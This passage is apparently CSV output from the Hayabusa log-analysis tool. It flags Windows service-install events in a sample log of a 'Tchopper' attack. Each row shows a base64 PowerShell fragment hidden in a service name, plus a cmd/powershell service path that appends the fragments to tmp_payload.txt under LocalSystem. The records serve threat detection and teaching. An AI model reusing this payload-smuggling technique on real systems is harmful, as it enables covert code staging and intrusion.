ICAgDQogICAgICAgICAgICBpZiAoJENvbXB1dGVyTGlzdFR5cGUgLWVxICRMT0NBTEhPU1RfT1BUKSB7DQogICAgICAgICAgICAgICAgV3JpdGUtTG9nICRJTkZPX0xPRyAiR2V0dGluZyBPUyBJbm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg101"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:40.731 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ICAgDQogICAgICAgICAgICBpZiAoJENvbXB1dGVyTGlzdFR5cGUgLWVxICRMT0NBTEhPU1RfT1BUKSB7DQogICAgICAgICAgICAgICAgV3JpdGUtTG9nICRJTkZPX0xPRyAiR2V0dGluZyBPUyBJbm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg101"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: 
LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:40.731 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgDQogICAgICAgICAgICBpZiAoJENvbXB1dGVyTGlzdFR5cGUgLWVxICRMT0NBTEhPU1RfT1BUKSB7DQogICAgICAgICAgICAgICAgV3JpdGUtTG9nICRJTkZPX0xPRyAiR2V0dGluZyBPUyBJbm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg101"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:42.184 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Zvcm1hdGlvbiBmb3IgJENvbXB1dGVyIg0KICAgICAgICAgICAgICAgICRPUyA9IChHZXQtV21pT2JqZWN0IFdpbjMyX09wZXJhdGluZ1N5c3RlbSkuQ2FwdGlvbg0KICAgICAgICAgICAgICAgIFdy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg102"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:42.184 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: Zvcm1hdGlvbiBmb3IgJENvbXB1dGVyIg0KICAgICAgICAgICAgICAgICRPUyA9IChHZXQtV21pT2JqZWN0IFdpbjMyX09wZXJhdGluZ1N5c3RlbSkuQ2FwdGlvbg0KICAgICAgICAgICAgICAgIFdy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg102"" | select -Expand DisplayName |out-file -append 
tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:42.184 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Zvcm1hdGlvbiBmb3IgJENvbXB1dGVyIg0KICAgICAgICAgICAgICAgICRPUyA9IChHZXQtV21pT2JqZWN0IFdpbjMyX09wZXJhdGluZ1N5c3RlbSkuQ2FwdGlvbg0KICAgICAgICAgICAgICAgIFdy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg102"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:43.623 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: aXRlLUxvZyAkSU5GT19MT0cgIiRPUyINCiAgICAgICAgICAgIH0NCiAgICAgICAgICAgIA0KICAgICAgICAgICAgaWYgKCRDb21wdXRlckxpc3RUeXBlIC1lcSAkRE9NQUlOX09QVCkgew0KICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg103"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:43.623 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: aXRlLUxvZyAkSU5GT19MT0cgIiRPUyINCiAgICAgICAgICAgIH0NCiAgICAgICAgICAgIA0KICAgICAgICAgICAgaWYgKCRDb21wdXRlckxpc3RUeXBlIC1lcSAkRE9NQUlOX09QVCkgew0KICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg103"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:43.623 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: aXRlLUxvZyAkSU5GT19MT0cgIiRPUyINCiAgICAgICAgICAgIH0NCiAgICAgICAgICAgIA0KICAgICAgICAgICAgaWYgKCRDb21wdXRlckxpc3RUeXBlIC1lcSAkRE9NQUlOX09QVCkgew0KICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg103"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:45.063 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cgIkdldHRpbmcgT1MgSW5mb3JtYXRpb24gZm9yICRDb21wdXRlciINCiAgICAgICAgICAgICAgICAjJE9TID0gKEdldC1XbWlPYmplY3QgV2lu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg104"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:45.063 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AgICAgICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cgIkdldHRpbmcgT1MgSW5mb3JtYXRpb24gZm9yICRDb21wdXRlciINCiAgICAgICAgICAgICAgICAjJE9TID0gKEdldC1XbWlPYmplY3QgV2lu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg104"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:45.063 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cgIkdldHRpbmcgT1MgSW5mb3JtYXRpb24gZm9yICRDb21wdXRlciINCiAgICAgICAgICAgICAgICAjJE9TID0gKEdldC1XbWlPYmplY3QgV2lu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg104"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:46.517 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MzJfT3BlcmF0aW5nU3lzdGVtIC1jb21wdXRlcm5hbWUgJENvbXB1dGVyIC1DcmVkZW50aWFsICRHbG9iYWw6Q3JlZCkuQ2FwdGlvbg0KDQogICAgICAgICAgICAgICAgJEdldEFEQ29tcHV0ZXJMaX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg105"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:46.517 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: MzJfT3BlcmF0aW5nU3lzdGVtIC1jb21wdXRlcm5hbWUgJENvbXB1dGVyIC1DcmVkZW50aWFsICRHbG9iYWw6Q3JlZCkuQ2FwdGlvbg0KDQogICAgICAgICAgICAgICAgJEdldEFEQ29tcHV0ZXJMaX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg105"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:46.517 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MzJfT3BlcmF0aW5nU3lzdGVtIC1jb21wdXRlcm5hbWUgJENvbXB1dGVyIC1DcmVkZW50aWFsICRHbG9iYWw6Q3JlZCkuQ2FwdGlvbg0KDQogICAgICAgICAgICAgICAgJEdldEFEQ29tcHV0ZXJMaX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg105"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:48.122 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: N0ID0gR2V0LUFEQ29tcHV0ZXIgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkIC1GaWx0ZXIge2VuYWJsZWQgLWVxICJ0cnVlIn0gLVByb3BlcnRpZXMgT3BlcmF0aW5nU3lzdGVtIHwgU2VsZWN0IERO | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg106"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:48.122 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: N0ID0gR2V0LUFEQ29tcHV0ZXIgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkIC1GaWx0ZXIge2VuYWJsZWQgLWVxICJ0cnVlIn0gLVByb3BlcnRpZXMgT3BlcmF0aW5nU3lzdGVtIHwgU2VsZWN0IERO | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg106"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:48.122 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: N0ID0gR2V0LUFEQ29tcHV0ZXIgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkIC1GaWx0ZXIge2VuYWJsZWQgLWVxICJ0cnVlIn0gLVByb3BlcnRpZXMgT3BlcmF0aW5nU3lzdGVtIHwgU2VsZWN0IERO | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg106"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:49.575 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: U0hvc3RuYW1lLCBPcGVyYXRpbmdTeXN0ZW0NCg0KICAgICAgICAgICAgICAgICMkR2V0QURPUyA9IEdldC1BRENvbXB1dGVyIC1DcmVkZW50aWFsICRHbG9iYWw6Q3JlZCAtRmlsdGVyIHtlbmFibG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg107"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:49.575 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: U0hvc3RuYW1lLCBPcGVyYXRpbmdTeXN0ZW0NCg0KICAgICAgICAgICAgICAgICMkR2V0QURPUyA9IEdldC1BRENvbXB1dGVyIC1DcmVkZW50aWFsICRHbG9iYWw6Q3JlZCAtRmlsdGVyIHtlbmFibG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg107"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:49.575 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: U0hvc3RuYW1lLCBPcGVyYXRpbmdTeXN0ZW0NCg0KICAgICAgICAgICAgICAgICMkR2V0QURPUyA9IEdldC1BRENvbXB1dGVyIC1DcmVkZW50aWFsICRHbG9iYWw6Q3JlZCAtRmlsdGVyIHtlbmFibG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg107"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:51.015 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: VkIC1lcSAidHJ1ZSJ9IC1Qcm9wZXJ0aWVzIE9wZXJhdGluZ1N5c3RlbSB8IFNlbGVjdCANCiAgICAgICAgICAgICAgICANCiAgICAgICAgICAgICAgICAjJENvbXB1dGVyTGlzdCA9ICRHZXRBRENv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg108"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:51.015 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: VkIC1lcSAidHJ1ZSJ9IC1Qcm9wZXJ0aWVzIE9wZXJhdGluZ1N5c3RlbSB8IFNlbGVjdCANCiAgICAgICAgICAgICAgICANCiAgICAgICAgICAgICAgICAjJENvbXB1dGVyTGlzdCA9ICRHZXRBRENv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg108"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:51.015 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: VkIC1lcSAidHJ1ZSJ9IC1Qcm9wZXJ0aWVzIE9wZXJhdGluZ1N5c3RlbSB8IFNlbGVjdCANCiAgICAgICAgICAgICAgICANCiAgICAgICAgICAgICAgICAjJENvbXB1dGVyTGlzdCA9ICRHZXRBRENv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg108"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:52.463 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: bXB1dGVyTGlzdC5ETlNIb3N0TmFtZQ0KDQoNCiAgICAgICAgICAgICAgICAkT1MgPSAoJEdldEFEQ29tcHV0ZXJMaXN0IC1tYXRjaCAkQ29tcHV0ZXIpLk9wZXJhdGluZ1N5c3RlbQ0KICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg109"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:52.463 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: bXB1dGVyTGlzdC5ETlNIb3N0TmFtZQ0KDQoNCiAgICAgICAgICAgICAgICAkT1MgPSAoJEdldEFEQ29tcHV0ZXJMaXN0IC1tYXRjaCAkQ29tcHV0ZXIpLk9wZXJhdGluZ1N5c3RlbQ0KICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg109"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:52.463 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: bXB1dGVyTGlzdC5ETlNIb3N0TmFtZQ0KDQoNCiAgICAgICAgICAgICAgICAkT1MgPSAoJEdldEFEQ29tcHV0ZXJMaXN0IC1tYXRjaCAkQ29tcHV0ZXIpLk9wZXJhdGluZ1N5c3RlbQ0KICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg109"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:53.917 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cgIiRPUyINCiAgICAgICAgICAgIH0gDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg110"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:53.917 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AgICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cgIiRPUyINCiAgICAgICAgICAgIH0gDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg110"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:53.917 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cgIiRPUyINCiAgICAgICAgICAgIH0gDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg110"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:55.362 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgICAgICAgICAgICAgICANCiAgICAgICAgICAgIA0KICAgICAgICAgICAgIyBSZXRyaWV2ZSB0aGUgQXBwbGljYXRpb24gRXZlbnQgbG9nIGluZm8NCiAgICAgICAgICAgICRBcHBsaWNhdGlvbk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg111"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:55.362 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ICAgICAgICAgICAgICAgICANCiAgICAgICAgICAgIA0KICAgICAgICAgICAgIyBSZXRyaWV2ZSB0aGUgQXBwbGljYXRpb24gRXZlbnQgbG9nIGluZm8NCiAgICAgICAgICAgICRBcHBsaWNhdGlvbk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg111"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:55.362 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgICAgICAgICAgICAgICANCiAgICAgICAgICAgIA0KICAgICAgICAgICAgIyBSZXRyaWV2ZSB0aGUgQXBwbGljYXRpb24gRXZlbnQgbG9nIGluZm8NCiAgICAgICAgICAgICRBcHBsaWNhdGlvbk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg111"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:56.815 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: luZm8gPSBHZXQtRXZlbnRMb2dJbmZvICRDb21wdXRlciBBcHBsaWNhdGlvbiAkUmVtb3RlQ29tcHV0ZXIgJE9TDQogICAgICAgICAgICAkQXBwbGljYXRpb25FUFMgPSAkQXBwbGljYXRpb25JbmZv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg112"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:56.815 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: luZm8gPSBHZXQtRXZlbnRMb2dJbmZvICRDb21wdXRlciBBcHBsaWNhdGlvbiAkUmVtb3RlQ29tcHV0ZXIgJE9TDQogICAgICAgICAgICAkQXBwbGljYXRpb25FUFMgPSAkQXBwbGljYXRpb25JbmZv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg112"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:56.815 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: luZm8gPSBHZXQtRXZlbnRMb2dJbmZvICRDb21wdXRlciBBcHBsaWNhdGlvbiAkUmVtb3RlQ29tcHV0ZXIgJE9TDQogICAgICAgICAgICAkQXBwbGljYXRpb25FUFMgPSAkQXBwbGljYXRpb25JbmZv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg112"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:58.263 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: LkF2ZXJhZ2VFdmVudHMNCiAgICAgICAgICAgICRBcHBsaWNhdGlvbkZpcnN0RXZlbnRUaW1lID0gJEFwcGxpY2F0aW9uSW5mby5TdGFydFRpbWUNCiAgICAgICAgICAgICRBcHBsaWNhdGlvbkxhc3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg113"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
